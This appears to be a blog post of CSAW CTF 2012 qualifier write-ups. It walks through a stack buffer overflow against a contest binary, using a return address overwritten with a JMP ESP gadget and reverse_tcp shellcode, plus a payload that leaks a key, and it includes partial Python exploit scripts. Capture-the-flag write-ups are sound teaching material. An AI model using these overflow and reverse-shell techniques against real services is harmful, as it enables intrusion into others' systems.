Sunday, September 30, 2012

CSAW CTF Quals: Exploitation 300

This one was interesting because it was all in Chinese (according to Google Translate). So we set up the binary on a local machine and got cracking. We ran some of the strings of Chinese through Google Translate and got the string "This part is not difficult, but I hope you have fun. If you give me a large amount of data, it may be a bad thing will happen." So we sent it a lot of stuff. And it broke.

We attached to the process with gdb and sent the program a pattern so we could figure out the offset of the return address we were overwriting and got an offset of 326 bytes. Now to figure out what to return to.

Turns out that the stack was executable and there was a convenient 'JMP ESP' sittin' around at address 0x08048F47, so we overwrote the return address with the jmp esp and then popped in some nice reverse_tcp shellcode and won! Our is posted below.
import socket, binascii

# For our pattern generator
#alph = 'abcefghijklmnopqrstuvwxyz'

def recv(s):
        print s.recv(1024)

def endian(s):
 if len(s) < 8:
  s = s.zfill(8)
 return s[6:8]+s[4:6]+s[2:4]+s[0:2]

s = socket.socket()
s.connect(('', 4842))

win = 'a'*326
win += binascii.unhexlify(endian('08048f47')) 
win += open('payload').read()+'\n'

# A simple pattern generator
#for i in alph:
# for j in range(0,10):
#  breaker += i + str(j)

print win, len(win)

  -- suntzu_II

CSAW CTF Quals: Exploitation 200

This binary was not so much an exploitation as understanding how the code that they were using worked. So we downloaded the binary and got to work. The important code is shown below.
  memset(&buf, 0, 0x200u);
  send(fd, "Wecome to my first CS project.\nPlease type your name:  ", 0x37u, 0);
  recv(fd, &buf, 0x204u, 0);
  v3 = 0;
  if ( !strcmp(&buf, "AAAAAAAAAAAAAAAAAAAAAAAAAA\n") )
    v4 = 1;
  if ( v4 )
    ::fd = (int)fopen("./key", "r");
    __isoc99_fscanf(::fd, "%s", &buf);
    recv(fd, 0, 0x10u, 64);
    send(fd, &buf, 0x200u, 0);
We got this working on our local machine and got the key by simply sending the string AAAAAAAAAAAAAAAAAAAAAAAAAA\n to the server and it would spit back our key that we created to us at the beginning of the string we wrote, like bobAAAAAAAAAAAAAAAAAAAAAAA. However, this did not work on their server to the bewilderment of our group.

We new that they gave us a large number of bytes to play with in the buffer and with the recv, so we eventually just sent AAAAAAAAAAAAAAAAAAAAAAAAAA\n+'A'*100+'\x00' to the game server and it spit back the key to us in embedded in the payload. We believe that it did not work in the first case because the buffer was set to all null bytes and there was not enough 'space' available to write to because the payload we sent to was too small to fit the key into. So our winning payload,, is shown below.
import socket

s = socket.socket()

winner += 'A'*(0x200-len(winner))+'\x00'
print winner
print s.recv(1024)

  -- suntzu_II

CSAW CTF Qualifiers 2012 Writeups

Hello everyone! Over the next few days, our team will be releasing writeups for the CSAW CTF Qualifiers 2012 Challenges. This is the first CTF that our team has ever solved all of the challenges for and we are going to hopefully help everyone out with the solutions to problems they did not get! Hope to see you checking in and commenting if you solved in a different way! Thanks!

Convenient Links!





Recon - Here

Trivia - Here

  -- suntzu_II